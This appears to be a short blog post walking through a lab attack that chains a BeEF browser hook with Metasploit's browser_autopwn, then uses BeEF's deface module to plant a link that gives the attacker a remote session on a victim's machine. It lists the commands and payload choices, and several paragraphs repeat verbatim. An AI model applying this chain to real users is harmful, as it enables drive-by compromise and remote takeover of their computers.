In this session, i will try to Combine the technique between Browser Exploitation and File Exploitation. First step that i do, i make a page of html. Inside that script html, i insert the link of js file. To copy the link of js file, i run the beef-Ng first.
Then i copy the hook URL and insert it to my html script. But the IP address of that URL of Hook URL i change with my IP address (192.168.56.1).
Then copy the UI URL and then paste it on the browser. So it will appear like this
Then insert the username beef and password beef.
Well, it's succes. Next step, i use msf framework. Fisrt i choose the auxiliary. i typed a command use auxiliary/server/browser_autopwn and then set the LHOST 192.168.56.1
Then i choose the payload.
I choose the Java Payload and Win32 Payload
After that, just type exploit command. And just wait.
If there was appear like the picture above, just copy the Local IP address and copy it to the beef. But the IP address i change with my IP. So that will be http://192.168.56.1:8080/kbFTCKLGh5XMe0. Just click on hooked browser the victims IP address. Then on the command menu, click on the misc folder -> deface web page.
On the menu deface web pages, i copy the local IP that i've copied from metasploit and typed like this.
I make a link with html script like the picture above. If the victims click that link, so the msf will running. After that, just click the execute button.
Then i choose the payload.
I choose the Java Payload and Win32 Payload
After that, just type exploit command. And just wait.
On the menu deface web pages, i copy the local IP that i've copied from metasploit and typed like this.
I make a link with html script like the picture above. If the victims click that link, so the msf will running. After that, just click the execute button.
Last, let's see on the victims browser
Well, if the victims click the link disini, then on the msf will be like this.
Ok, it's succes. Now typed sessions -l to see the active session.
Then, just typed session -i 1 to entry that session from the picture above,
Then, just typed session -i 1 to entry that session from the picture above,
Well, the combination was Succesfull :D
No comments:
Post a Comment